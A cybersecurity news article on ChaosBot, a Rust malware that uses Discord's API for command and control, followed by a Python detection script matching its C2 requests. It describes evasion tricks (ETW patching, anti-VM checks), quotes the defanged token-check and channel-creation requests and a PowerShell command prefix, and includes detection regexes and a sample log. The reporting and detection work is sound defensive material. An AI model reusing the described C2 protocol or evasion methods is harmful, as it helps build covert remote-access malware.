New Rust-Based ChaosBot Malware Leverages Discord for Stealthy Command and Control

A sophisticated new threat has emerged in the cybersecurity landscape, leveraging the popular communication platform Discord to conduct covert operations.

ChaosBot, a Rust-based malware strain, represents an evolution in adversarial tactics by hiding malicious command and control traffic within legitimate cloud service communications.

This approach allows attackers to blend seamlessly into normal network traffic, making detection significantly more challenging for traditional security solutions.

The malware operates through a carefully orchestrated infection chain that begins with either compromised VPN credentials or phishing campaigns using malicious Windows shortcut files.

Once executed, ChaosBot establishes persistent access by validating its Discord bot token and creating a dedicated private channel named after the victim’s computer.

This channel becomes an interactive command shell where attackers issue commands such as shell, download, and scr (screenshot), with results exfiltrated back as attached files through Discord’s API.

Picus Security researchers identified the malware’s evasion capabilities, which include patching the Event Tracing for Windows (ETW) function to blind endpoint detection systems and performing anti-virtualization checks against known MAC address prefixes for VMware and VirtualBox environments.

These techniques demonstrate a deliberate effort to evade analysis in sandboxed security research environments.

Discord-Based Command and Control Infrastructure

ChaosBot’s technical implementation reveals a well-engineered C2 protocol built entirely on Discord’s API infrastructure.

Written in Rust and using the reqwest or serenity libraries, the malware communicates over standard HTTPS requests that look identical to legitimate Discord traffic.

Upon initial execution, ChaosBot validates its embedded bot token with a GET request to hxxps://discord[.]com/api/v10/users/@me.

Following successful authentication, it creates a victim-specific channel using a POST request:

POST hxxps://discord[.]com/api/v10/guilds/<THREAT_ACTOR_GUILD_ID>/channels 
{"name":"<VICTIM_COMPUTER_NAME>","type":0}

Command execution relies on a continuous polling mechanism that checks for new messages in the victim’s channel.

When operators issue shell commands, ChaosBot forces UTF-8 output encoding through PowerShell: powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; <SOME_COMMAND>".

The command output, screenshots, or downloaded files are then uploaded back to Discord as multipart/form-data attachments, creating a fully functional remote access capability through a platform trusted by most corporate firewalls and security appliances.
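The protocol described above gives defenders a small set of observables: a non-browser process validating a bot token at users/@me, creating a guild channel, uploading multipart attachments, and spawning PowerShell with the UTF-8 encoding prefix. The following is an added detection example, not code from the article or from Picus Security. It runs over constructed proxy/EDR records in a hypothetical pipe-delimited format; the browser allow-list, the channels/{id}/messages upload path and the rule names are assumptions, not values quoted by the article.

```python
import re
from collections import defaultdict

# Processes expected to reach discord.com on a normal workstation.
# Assumed allow-list; tune per environment.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "discord.exe"}

# API paths the article attributes to ChaosBot's C2 protocol.
TOKEN_VALIDATION = re.compile(r"^/api/v\d+/users/@me$")
CHANNEL_CREATE = re.compile(r"^/api/v\d+/guilds/\d+/channels$")
# Attachment upload path is an assumption (standard Discord REST endpoint),
# not a path quoted in the article.
CHANNEL_MESSAGES = re.compile(r"^/api/v\d+/channels/\d+/messages$")
# PowerShell encoding prefix quoted in the article.
UTF8_FORCE = re.compile(
    r"\$OutputEncoding\s*=\s*\[System\.Text\.Encoding\]::UTF8", re.IGNORECASE
)

# Constructed sample: kind|process|host|method_or_cmdline|path|content_type.
# Process-creation records carry the command line in the fourth field.
SAMPLE_LOG = """\
http|chaos.exe|discord.com|GET|/api/v10/users/@me|
http|chaos.exe|discord.com|POST|/api/v10/guilds/123456789012345678/channels|application/json
process|chaos.exe||powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; whoami"||
http|chaos.exe|discord.com|POST|/api/v10/channels/987654321098765432/messages|multipart/form-data
http|chrome.exe|discord.com|GET|/api/v10/users/@me|
http|msedge.exe|discord.com|POST|/api/v10/channels/987654321098765432/messages|multipart/form-data
"""


def parse_line(line):
    """Split one hypothetical log record into a dict (six pipe-separated fields)."""
    kind, process, host, field4, path, ctype = line.rstrip("\n").split("|")
    return {"kind": kind, "process": process.lower(), "host": host,
            "method": field4, "path": path, "content_type": ctype}


def detect(lines):
    """Return (rule, process) findings in discovery order.

    Individual stages fire on their own; the sequence rule fires once a single
    non-browser process has both validated a token and created a channel.
    """
    findings = []
    stages = defaultdict(set)  # process -> C2 stages observed so far
    for ev in map(parse_line, lines):
        proc = ev["process"]
        if ev["kind"] == "process":
            cmdline = ev["method"]
            if "powershell" in cmdline.lower() and UTF8_FORCE.search(cmdline):
                findings.append(("powershell_forced_utf8", proc))
            continue
        if ev["host"] != "discord.com" or proc in BROWSER_PROCESSES:
            continue
        path, method = ev["path"], ev["method"]
        if method == "GET" and TOKEN_VALIDATION.match(path):
            stages[proc].add("token")
            findings.append(("discord_bot_token_check", proc))
        elif method == "POST" and CHANNEL_CREATE.match(path):
            stages[proc].add("channel")
            findings.append(("discord_channel_create", proc))
        elif (method == "POST" and CHANNEL_MESSAGES.match(path)
              and "multipart/form-data" in ev["content_type"]):
            findings.append(("discord_attachment_upload", proc))
        seq = ("chaosbot_c2_sequence", proc)
        if {"token", "channel"} <= stages[proc] and seq not in findings:
            findings.append(seq)
    return findings


if __name__ == "__main__":
    for rule, proc in detect(SAMPLE_LOG.splitlines()):
        print(f"{rule:28s} {proc}")
```

The browser allow-list is what keeps this usable: Discord's own client and browsers legitimately hit users/@me, so the signal is the combination of an unexpected process, the bot-facing endpoints, and the multipart upload, rather than any single request. The sequence rule is the one worth paging on; the per-stage rules are better kept as context in the same case.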


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
